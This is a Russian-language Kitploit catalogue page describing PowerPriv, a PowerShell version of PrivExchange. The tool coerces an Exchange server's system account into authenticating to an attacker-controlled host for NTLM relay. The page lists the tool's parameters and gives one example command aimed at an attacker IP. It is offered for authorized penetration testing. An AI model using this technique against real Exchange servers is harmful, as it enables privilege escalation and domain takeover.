Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PowerPriv — Реализация PrivExchange на PowerShell, предназначенная для запуска в контексте текущего пользователя | Kitploit
Инструменты/GitHubGitHub/g0ldengunsec/powerpriv
Повышение привилегийЭксплуатацияЛатеральное перемещениеТестирование на ПроникновениеАутентификация
GitHubg0ldengunsec/powerpriv

PowerPriv

Реализация PrivExchange на PowerShell, предназначенная для запуска в контексте текущего пользователя

Репозиторий
1252437 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PowerPriv

ОПИСАНИЕ

Реализация PrivExchange на PowerShell от @_dirkjan (оригинальный код находится здесь: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Полезно в средах, где нельзя запускать приложения на Python, есть учетные данные пользователя или не хочется записывать файлы на диск. Приведет к тому, что системная учетная запись целевого Exchange-сервера попытается аутентифицироваться на выбранной вами системе.

-targetHost

Имя хоста или IP целевого Exchange-сервера. В зависимости от настроек DNS может потребоваться FQDN, если используется имя хоста. (Обязательно)

-attackerHost

Имя хоста или IP системы, которую вы контролируете, и на которой в идеале запущен ntlmrelayx. Мы указываем Exchange-серверу попытаться аутентифицироваться на этой системе. В зависимости от настроек DNS может потребоваться FQDN, если используется имя хоста. (Обязательно)

-exchangePort

Порт для подключения к Exchange-серверу. По умолчанию 443.

-attackerPort

Порт, на который Exchange должен попытаться подключиться обратно к атакующему. По умолчанию 80

-attackerPage

Страница, на которую мы указываем Exchange-серверу подключиться на нашей атакующей системе. Слеши не требуются. По умолчанию powerPriv.

-noSSL

Установите true, если не хотите использовать HTTPS для первоначального подключения к Exchange-серверу. По умолчанию false (использовать HTTPS).

-Version

Версия целевого Exchange-сервера. По умолчанию 2013.

ПРИМЕР

root@kitploit:~
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016

ПРИМЕЧАНИЯ

root@kitploit:~
Автор: @g0ldenGunSec  - На основе инструмента, созданного @_dirkjan
Используйте этот инструмент только в сетях, которыми вы владеете или на тестирование которых у вас есть разрешение.
Скачать инструмент